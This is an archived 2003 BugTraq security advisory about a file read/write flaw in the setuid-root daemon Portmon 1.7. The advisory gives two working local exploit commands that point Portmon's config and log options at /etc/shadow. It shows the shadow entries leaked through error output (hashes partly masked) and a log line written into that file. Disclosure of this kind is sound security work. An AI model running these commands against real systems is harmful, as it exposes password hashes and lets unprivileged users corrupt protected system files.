BugTraq
Portmon file arbitrary read/write access vulnerability Jun 16 2003 11:54PM
Luca Ercoli (luca ercoli inwind it)


Package: Portmon

Auth: http://www.aboleo.net/

Version(s): 1.7 (prior ?)

Vulnerability: File arbitrary read/write access

vulnerability

Portmon is a network service monitoring daemon

(http://www.aboleo.net/software/portmon/).

"In order to use ping support, Portmon must run as root

or be installed setuid with root permissions

due to the fact that it must open up a raw socket."

The product suffer from a security problem that allows

any local user to read/write protected files on the system.

This is dude to a hole in the way the program handles

loading of two configuration files: host file/log file.

Example (read):

[lucae@linux lucae]$portmon -c /etc/shadow

Unable to resolve hostname

root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7:::

Unable to resolve hostname bin:*:12172:0:99999:7:::

Unable to resolve hostname daemon:*:12172:0:99999:7:::

Unable to resolve hostname adm:*:12172:0:99999:7:::

Unable to resolve hostname lp:*:12172:0:99999:7:::

Unable to resolve hostname sync:*:12172:0:99999:7:::

Unable to resolve hostname shutdown:*:12172:0:99999:7:::

Unable to resolve hostname halt:*:12172:0:99999:7:::

Unable to resolve hostname mail:*:12172:0:99999:7:::

Unable to resolve hostname news:*:12172:0:99999:7:::

<snip>

Example (write):

[lucae@linux lucae]$portmon -l /etc/shadow

fopen: No such file or directory

Failed reading config file hosts

[root@linux root]#cat /etc/shadow

<snip>

lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7:::

nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7:::

test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7:::

(Mon Jun 16 01:40:17 2003) - Portmon started by user

lucae //line added

[root@linux root]#

Luca Ercoli luca.ercoli[at]inwind.it

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus